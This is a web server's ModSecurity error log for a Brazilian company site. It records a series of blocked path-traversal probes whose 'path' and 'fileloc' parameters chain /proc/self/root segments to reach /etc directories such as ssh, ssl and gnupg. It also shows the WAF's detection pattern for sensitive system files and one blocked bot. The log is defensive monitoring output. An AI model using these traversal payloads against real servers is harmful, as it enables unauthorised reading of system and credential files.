[Thu Mar 19 04:46:34.367128 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.243.128:55608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup2v-YZRR_7pZ7nDJcPgAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:46:36.835263 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:55612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup3OyqAr6etmhZHNoygAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:46:46.902336 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:55620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup5sdf6f5d65gmYZRCRQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:46:53.914425 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:48258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup7eoXxyEfFpUF8f_figAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:47:00.886986 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:34122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup9OyqAr6etmhZHNoykwAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:47:11.572203 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:49308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abup_-oXxyEfFpUF8f_fmgAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:13.070100 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:60212] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqAQkwaGbbGflqUZCD0gAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:14.283230 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.244.43:39246] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuqAta6ubjKNq_cu4YQqAAAA1E"]
[Thu Mar 19 04:47:14.361333 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:60226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqAta6ubjKNq_cu4YQqQAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:15.630879 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:60240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqAwkwaGbbGflqUZCD0wAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:16.912890 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:60242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqBNa6ubjKNq_cu4YQrwAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:18.232967 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:52888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqBgkwaGbbGflqUZCD1AAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:18.461555 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:50902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqBuyqAr6etmhZHNoyqwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:47:19.615727 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:52890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqBwkwaGbbGflqUZCD1gAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:20.905895 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:52894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqCNa6ubjKNq_cu4YQtQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:26.419236 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:52906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqDvu8EFLIOrSqIptswgAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:28.762111 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:41640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqEOyqAr6etmhZHNoyrgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:29.990684 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:41652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqEeyqAr6etmhZHNoyrwAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:31.391289 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:41668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqE-oXxyEfFpUF8f_fowAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:32.817081 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:41684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqFP-YZRR_7pZ7nDJcUwAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:35.961224 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:41690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqFwkwaGbbGflqUZCD5QAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:37.282363 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.241.31:38948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqGf-YZRR_7pZ7nDJcVQAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
